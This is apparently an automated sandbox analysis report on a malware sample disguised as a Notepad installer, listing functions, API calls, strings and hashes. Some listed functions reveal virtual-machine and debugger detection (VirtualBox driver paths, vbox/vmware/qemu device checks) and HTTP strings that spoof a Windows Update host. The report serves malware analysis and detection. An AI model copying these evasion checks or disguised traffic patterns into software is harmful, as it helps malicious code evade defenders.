                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: CloseFind_errnofree
                                      • String ID:
                                      • API String ID: 1660445202-0
                                      • Opcode ID: 347ceb2ece9a33697517600c38b13913a8b214db0fff89bc9190d453dc0efc86
                                      • Instruction ID: 736b3ee0bdbcbf2267578ce17fac7c8a8ad3650b082484814c5fa3da888b4290
                                      • Opcode Fuzzy Hash: 347ceb2ece9a33697517600c38b13913a8b214db0fff89bc9190d453dc0efc86
                                      • Instruction Fuzzy Hash: F6E04FB05043028BC7003E75898261A36946B01354F450A7EEC90AB2C7EABC88508797
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E720E Relevance: 2.6, APIs: 2, Instructions: 73COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 006E7198: malloc.MSVCRT ref: 006E719E
                                        • Part of subcall function 006E7198: ??3@YAXPAX@Z.MSVCRT ref: 006E71B8
                                      • memcpy.NTDLL(-0000009C,?,00000000,?,?,?,-0000009C,?,006E48CC,00000000,?,?,?,?), ref: 006E7241
                                      • memcpy.NTDLL(-0000009C,?,00000000,?,?,?,-0000009C,?,006E48CC,00000000,?,?,?,?), ref: 006E7274
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcpy$??3@malloc
                                      • String ID:
                                      • API String ID: 2710600644-0
                                      • Opcode ID: 269610b1bbd20290d52c82c248a0f4e44d32cdce5011754fcab2252b03f67031
                                      • Instruction ID: 05ba40a02dd08cf6b5a35a231ab759468c0b3b9d9b904cb28df26839c8fa4919
                                      • Opcode Fuzzy Hash: 269610b1bbd20290d52c82c248a0f4e44d32cdce5011754fcab2252b03f67031
                                      • Instruction Fuzzy Hash: 9211987290534BAFCF40BE7ADC869AB3B6EEB11310B444015FE04DA147E661D65697A0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E737E Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _alloca_probe
                                      • String ID:
                                      • API String ID: 532146377-0
                                      • Opcode ID: a39a3edbc7a29cd53cd565786b7306b83048cb4d6fd7f5de49ba7eccdeb08855
                                      • Instruction ID: e74b4c703d7c4e4d367b5a385d863a93bf645f64ec6f9f685f3848ac0a87b513
                                      • Opcode Fuzzy Hash: a39a3edbc7a29cd53cd565786b7306b83048cb4d6fd7f5de49ba7eccdeb08855
                                      • Instruction Fuzzy Hash: 7E018072605309AFDB10DF5ACC819DAB7A9FF48350B148429ED5987301D730FE158BB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006F08B6 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,006E4E1F,?,006F014D,?,006E4E1F,006E4E1F,006E745D,?,006E7461,006E7492,006E7445,?), ref: 006F0910
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateEvent
                                      • String ID:
                                      • API String ID: 2692171526-0
                                      • Opcode ID: 0f7bfff48c263af6a8cbbd9a160308d795af230f0c9aadb351ab2a8db281898a
                                      • Instruction ID: 59a90278bad331201becb07b9023074c1a281d290578da5ea64ec8f3f4b4f1b9
                                      • Opcode Fuzzy Hash: 0f7bfff48c263af6a8cbbd9a160308d795af230f0c9aadb351ab2a8db281898a
                                      • Instruction Fuzzy Hash: A90125746047099FFB20CE25D440AB3B7FAFB88364F009A1EE98686742E370F8418B50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E61D4 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 006E5F12: GetModuleHandleA.KERNEL32(ntdll.dll), ref: 006E5F21
                                        • Part of subcall function 006E5F12: GetProcAddress.KERNEL32(00000000,ZwQueryInformationProcess), ref: 006E5F2D
                                        • Part of subcall function 006E5F12: GetCurrentProcess.KERNEL32(00000022,00000000,00000004,?), ref: 006E5F45
                                        • Part of subcall function 006E5F12: NtQueryInformationProcess.NTDLL(00000000), ref: 006E5F4C
                                        • Part of subcall function 006E6320: memset.NTDLL ref: 006E6330
                                        • Part of subcall function 006E6320: memset.NTDLL ref: 006E6340
                                        • Part of subcall function 006E6320: memset.NTDLL ref: 006E634D
                                      • SetErrorMode.KERNELBASE(?), ref: 006E622D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memset$Process$AddressCurrentErrorHandleInformationModeModuleProcQuery
                                      • String ID:
                                      • API String ID: 2397146103-0
                                      • Opcode ID: 952ab5ca0205fbdd7372eff8853b130b831d467fc213ff1d4a97a0a84aab6f45
                                      • Instruction ID: 167e3a356b090d84d64d70ec0f129ddba433524907e3832e1e48c80ae65f408d
                                      • Opcode Fuzzy Hash: 952ab5ca0205fbdd7372eff8853b130b831d467fc213ff1d4a97a0a84aab6f45
                                      • Instruction Fuzzy Hash: D7F090721037913DAB8177A3DD0A9EF365E9E21384F000018FA0191143FFB59B4586F9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E7329 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: c944721003f9882782ca8f6fbd9ce990e2b23a21e8fedf2c28e3d93991b73edc
                                      • Instruction ID: 04b59fe48fd5d6f40eaee490d4fb736bcd3afef6e5a0f62de5b56e8b56b72261
                                      • Opcode Fuzzy Hash: c944721003f9882782ca8f6fbd9ce990e2b23a21e8fedf2c28e3d93991b73edc
                                      • Instruction Fuzzy Hash: 16C012371081105F82409749FC0088A73ECEEC9521316005AF205D3120CA20BC428BB4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00408624 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID:
                                      • API String ID: 471065373-0
                                      • Opcode ID: 2d95a8740db52a9e1dab7d8880fea38aaf783ddc7ae2c6cec60aab88f4132965
                                      • Instruction ID: 31d61cb1dbc44f0e435323a82069d69e566a3f74c41cf237bfd770c4efd72473
                                      • Opcode Fuzzy Hash: 2d95a8740db52a9e1dab7d8880fea38aaf783ddc7ae2c6cec60aab88f4132965
                                      • Instruction Fuzzy Hash: 46C08C766093108FD310DF18F8C000DF7A0FF88720F008C2EEA9943301C331A8818B8A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401330 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: atexit
                                      • String ID:
                                      • API String ID: 3413467201-0
                                      • Opcode ID: 0bead6b47293565cb1ae939ef5b26f297e952b18d877f41bc6bde03c2e1a12de
                                      • Instruction ID: 282a1eac1086ccef479b18aa3bc8e732537fd2e178575a43fbf9a7c7181e7d4a
                                      • Opcode Fuzzy Hash: 0bead6b47293565cb1ae939ef5b26f297e952b18d877f41bc6bde03c2e1a12de
                                      • Instruction Fuzzy Hash: F4A0121000420452D6043769050300875DC044078CF80046DECC1325D2D6B8904002EB
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E642A Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: 78dfa5fa57768774f4a346a44046a88468b0ca9dc67a153b66f15f1df344d3ee
                                      • Instruction ID: 80b7cd86879e31e405f0d518f67e65ee874cdf75d1a31fb0ba3eef022dd96651
                                      • Opcode Fuzzy Hash: 78dfa5fa57768774f4a346a44046a88468b0ca9dc67a153b66f15f1df344d3ee
                                      • Instruction Fuzzy Hash: 47B09231086340EA87441F04D91C0697AA3EA90B02F15D418B186011A08B304810EA02
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E4151 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: 67d280bfd8f7f0dec4e9cf0e2f41688b99123b0baded8fc1378d3d8cd202d006
                                      • Instruction ID: 6cfb09f920b490ae6ce57349dd97b86126d3306766eb948dfcb183250cc14a16
                                      • Opcode Fuzzy Hash: 67d280bfd8f7f0dec4e9cf0e2f41688b99123b0baded8fc1378d3d8cd202d006
                                      • Instruction Fuzzy Hash: 5FA00271045142DBCB451B10EC1845D7F62FB84652B255459F04740570CF314461EE11
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E6305 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNELBASE(?), ref: 006E630D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: e58fb04bf8307ef9e59311ad68e6793ee857856729bfdc2c679c958526c6e4bd
                                      • Instruction ID: bbe97fb0fdf796f7d02d65c7dead2db828113409e6ff866594b2fea672e426be
                                      • Opcode Fuzzy Hash: e58fb04bf8307ef9e59311ad68e6793ee857856729bfdc2c679c958526c6e4bd
                                      • Instruction Fuzzy Hash: 71A00134108202AFCE029B14C84884ABFA1AF89391F048898B48987230C73198919A02
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E81C0 Relevance: 1.3, APIs: 1, Instructions: 40COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: calloc
                                      • String ID:
                                      • API String ID: 2635317215-0
                                      • Opcode ID: 384b2fb0142cdb4641da3ca5da0cc560203f1e77828d9cb8a06fa687ba92500e
                                      • Instruction ID: b3c4ff83ccee78e2a02bc11dc4c9ed7c59f475ffb123b67bcb697160604e46fb
                                      • Opcode Fuzzy Hash: 384b2fb0142cdb4641da3ca5da0cc560203f1e77828d9cb8a06fa687ba92500e
                                      • Instruction Fuzzy Hash: 3AF0AF716417419FD7248F05ECA2F96B3E6EB44720F24845EF2495B2D2CA709800CB48
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00408660 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID:
                                      • API String ID: 1294909896-0
                                      • Opcode ID: 30e7f731514a9fc9e7bbe468e96ac36695858e1f125d4f2b5c389d0f779e5717
                                      • Instruction ID: 22f9e92269f5ec9243687c7aab4efb8b6c3952a674db2bc7ce4a160a6efcc108
                                      • Opcode Fuzzy Hash: 30e7f731514a9fc9e7bbe468e96ac36695858e1f125d4f2b5c389d0f779e5717
                                      • Instruction Fuzzy Hash: 2ED0E9B49097449BC744EF75D58951DBBE0BE88604F814C2DF88487201E77595948B47
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401AC5 Relevance: 1.3, APIs: 1, Instructions: 7COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: calloc
                                      • String ID:
                                      • API String ID: 2635317215-0
                                      • Opcode ID: 400a5b31264001ace6fa805719733d0553b7cb0830741b4c11e7330101fd3ec5
                                      • Instruction ID: 06d28f1f408c031d718848a2c9a507bb34140507b9288ef53592e356dc29b051
                                      • Opcode Fuzzy Hash: 400a5b31264001ace6fa805719733d0553b7cb0830741b4c11e7330101fd3ec5
                                      • Instruction Fuzzy Hash: 23B09BB48043408FC700FF1CC10131976E07B44304FC5495DE8CC53342E27D55545B57
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Function 006EC7A0 Relevance: 63.1, APIs: 18, Strings: 18, Instructions: 81libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(ntdll.dll,?,?,?,006E823A), ref: 006EC7AE
                                      • GetProcAddress.KERNEL32(00000000,ZwClose), ref: 006EC7BE
                                      • GetProcAddress.KERNEL32(00000000,ZwQueryObject), ref: 006EC7CB
                                      • GetProcAddress.KERNEL32(00000000,ZwYieldExecution), ref: 006EC7D8
                                      • GetProcAddress.KERNEL32(00000000,ZwCreateDebugObject), ref: 006EC7E5
                                      • GetProcAddress.KERNEL32(00000000,ZwQueryInformationProcess), ref: 006EC7F2
                                      • GetProcAddress.KERNEL32(00000000,ZwQuerySystemInformation), ref: 006EC7FF
                                      • GetProcAddress.KERNEL32(00000000,ZwQueryInformationThread), ref: 006EC80C
                                      • GetProcAddress.KERNEL32(00000000,ZwSetInformationThread), ref: 006EC819
                                      • GetProcAddress.KERNEL32(00000000,ZwQueryDirectoryObject), ref: 006EC826
                                      • GetProcAddress.KERNEL32(00000000,ZwOpenDirectoryObject), ref: 006EC833
                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,006E823A), ref: 006EC83F
                                      • GetProcAddress.KERNEL32(00000000,GetSystemFirmwareTable), ref: 006EC84D
                                      • GetProcAddress.KERNEL32(00000000,EnumSystemFirmwareTables), ref: 006EC85A
                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 006EC867
                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 006EC874
                                      • LoadLibraryW.KERNEL32(PowrProf.dll,?,006E823A), ref: 006EC880
                                      • GetProcAddress.KERNEL32(00000000,GetPwrCapabilities), ref: 006EC890
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$HandleModule$LibraryLoad
                                      • String ID: EnumSystemFirmwareTables$GetPwrCapabilities$GetSystemFirmwareTable$PowrProf.dll$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$ZwClose$ZwCreateDebugObject$ZwOpenDirectoryObject$ZwQueryDirectoryObject$ZwQueryInformationProcess$ZwQueryInformationThread$ZwQueryObject$ZwQuerySystemInformation$ZwSetInformationThread$ZwYieldExecution$kernel32.dll$ntdll.dll
                                      • API String ID: 551388010-37680696
                                      • Opcode ID: 06f39c7ae5db90ac61778e49da36cef275d2d72a2573bf6fccb35e66155643a5
                                      • Instruction ID: f5f42b9bdfe505b6412874dcbe6fcef392d66182230792378d8c899e7a9c4a2b
                                      • Opcode Fuzzy Hash: 06f39c7ae5db90ac61778e49da36cef275d2d72a2573bf6fccb35e66155643a5
                                      • Instruction Fuzzy Hash: 10219CB0E4032966C7109FBA9C4AD36AEFBEE95B51301541BB608E3664DAF49400CE65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E396E Relevance: 43.9, APIs: 9, Strings: 16, Instructions: 182COMMON
                                      Download Yara Rule
                                      APIs
                                      • rand.MSVCRT ref: 006E399B
                                      • memset.NTDLL ref: 006E39BD
                                      • GetUserDefaultLangID.KERNEL32(00000059,?,00000010), ref: 006E39D3
                                      • GetLocaleInfoW.KERNEL32(?), ref: 006E39DF
                                      • GetUserDefaultLangID.KERNEL32(0000005A,?,00000010), ref: 006E39E9
                                      • GetLocaleInfoW.KERNEL32(?), ref: 006E39EF
                                      • _snwprintf.NTDLL ref: 006E3A07
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000020,00000000,00000000), ref: 006E3A29
                                      • _snprintf.NTDLL ref: 006E3AC6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DefaultInfoLangLocaleUser$ByteCharMultiWide_snprintf_snwprintfmemsetrand
                                      • String ID: %s-%s$:o$CSRF-TOKEN=%s; LANG=%s$Connection$Cookie$GET$Host$User-Agent$X-CSRF-TOKEN$Z$catalog.s.download.windowsupdate.com$close$curl/5.9$dEo$:o$Bo
                                      • API String ID: 1200320670-2946613083
                                      • Opcode ID: 20b73b044537189231b90f845d2661702998f1b41d26d49792fce83d7e3c55da
                                      • Instruction ID: eed9c28e5fe4781c38e09e1328ae7483e34f12813b623a9589d3ac040790e8d5
                                      • Opcode Fuzzy Hash: 20b73b044537189231b90f845d2661702998f1b41d26d49792fce83d7e3c55da
                                      • Instruction Fuzzy Hash: 39616EB1A01348AFDB50DFA6DC85BBE7BBAEB44304F004469F685E7291DB719A44CF14
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EB534 Relevance: 36.8, APIs: 4, Strings: 17, Instructions: 66COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 006EB5C6
                                        • Part of subcall function 006E98DD: GetModuleHandleA.KERNEL32(kernel32.dll,?,?,006EB5D1), ref: 006E98F3
                                        • Part of subcall function 006E98DD: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 006E98FF
                                        • Part of subcall function 006E98DD: GetCurrentProcess.KERNEL32(00000000,?,?,006EB5D1), ref: 006E9912
                                      • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 006EB5D9
                                      • PathCombineW.SHLWAPI(?,?,006F5C24,00000000,006EB649), ref: 006EB5F7
                                      • Wow64RevertWow64FsRedirection.KERNEL32(?), ref: 006EB624
                                      Strings
                                      • System32\vboxoglpackspu.dll, xrefs: 006EB5A0
                                      • System32\vboxdisp.dll, xrefs: 006EB568
                                      • System32\drivers\VBoxMouse.sys, xrefs: 006EB54C
                                      • System32\vboxservice.exe, xrefs: 006EB5AE
                                      • System32\vboxogl.dll, xrefs: 006EB57D
                                      • System32\VBoxControl.exe, xrefs: 006EB5BC
                                      • System32\drivers\VBoxVideo.sys, xrefs: 006EB561
                                      • System32\vboxtray.exe, xrefs: 006EB5B5
                                      • System32\vboxoglerrorspu.dll, xrefs: 006EB592
                                      • System32\vboxmrxnp.dll, xrefs: 006EB576
                                      • System32\vboxoglpassthroughspu.dll, xrefs: 006EB5A7
                                      • System32\vboxoglcrutil.dll, xrefs: 006EB58B
                                      • System32\drivers\VBoxGuest.sys, xrefs: 006EB553
                                      • System32\vboxhook.dll, xrefs: 006EB56F
                                      • System32\vboxoglarrayspu.dll, xrefs: 006EB584
                                      • System32\drivers\VBoxSF.sys, xrefs: 006EB55A
                                      • System32\vboxoglfeedbackspu.dll, xrefs: 006EB599
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Wow64$Redirection$AddressCombineCurrentDirectoryDisableHandleModulePathProcProcessRevertWindows
                                      • String ID: System32\VBoxControl.exe$System32\drivers\VBoxGuest.sys$System32\drivers\VBoxMouse.sys$System32\drivers\VBoxSF.sys$System32\drivers\VBoxVideo.sys$System32\vboxdisp.dll$System32\vboxhook.dll$System32\vboxmrxnp.dll$System32\vboxogl.dll$System32\vboxoglarrayspu.dll$System32\vboxoglcrutil.dll$System32\vboxoglerrorspu.dll$System32\vboxoglfeedbackspu.dll$System32\vboxoglpackspu.dll$System32\vboxoglpassthroughspu.dll$System32\vboxservice.exe$System32\vboxtray.exe
                                      • API String ID: 1174745796-2122297659
                                      • Opcode ID: 0aa4956043acabc281869813967222e0d9c4422dc75dd967dd68021bbd4ee051
                                      • Instruction ID: b53a524905c03050131c58dc3b579f831aac0d0fbe12029cb4aafd2d7148e798
                                      • Opcode Fuzzy Hash: 0aa4956043acabc281869813967222e0d9c4422dc75dd967dd68021bbd4ee051
                                      • Instruction Fuzzy Hash: 1721F5B1801B9D9BCF10DFD1D8888EEBFBAAF04319F101459E706AA200D7B09A48CF64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EAAA5 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 110memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetupDiGetClassDevsW.SETUPAPI(006F32A0,00000000,00000000,00000002), ref: 006EAABD
                                      • SetupDiEnumDeviceInfo.SETUPAPI(00000000,00000000,?), ref: 006EAADF
                                      • SetupDiGetDeviceRegistryPropertyW.SETUPAPI(?,0000001C,00000001,?,00000000,?,?), ref: 006EAB10
                                      • GetLastError.KERNEL32 ref: 006EAB16
                                      • LocalFree.KERNEL32(00000000), ref: 006EAB26
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 006EAB34
                                      • StrStrIW.SHLWAPI(00000000,vbox), ref: 006EAB4C
                                      • StrStrIW.SHLWAPI(00000000,vmware), ref: 006EAB58
                                      • StrStrIW.SHLWAPI(00000000,qemu), ref: 006EAB64
                                      • StrStrIW.SHLWAPI(00000000,virtual), ref: 006EAB70
                                      • SetupDiEnumDeviceInfo.SETUPAPI(?,00000000,0000001C), ref: 006EAB83
                                      • LocalFree.KERNEL32(00000000), ref: 006EABA1
                                      • SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 006EABAA
                                      • GetLastError.KERNEL32 ref: 006EABB6
                                      • GetLastError.KERNEL32 ref: 006EABBC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Setup$Device$ErrorInfoLastLocal$EnumFree$AllocClassDestroyDevsListPropertyRegistry
                                      • String ID: qemu$vbox$virtual$vmware
                                      • API String ID: 3271178798-2646423876
                                      • Opcode ID: da224be17304214af500cd0e12a67e4c78d4270e506e5fc29684296bd81ab6b2
                                      • Instruction ID: 6d2dae9791013c9e400067493ae00c4860da393e54e9aa7c5b54d80185132458
                                      • Opcode Fuzzy Hash: da224be17304214af500cd0e12a67e4c78d4270e506e5fc29684296bd81ab6b2
                                      • Instruction Fuzzy Hash: 1C315C3190272BABDB219BE6DC54EFFBB7BAF05704B000155F901E2254D770AE41CAA6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EBDC6 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 166stringCOMMON
                                      Download Yara Rule
                                      APIs
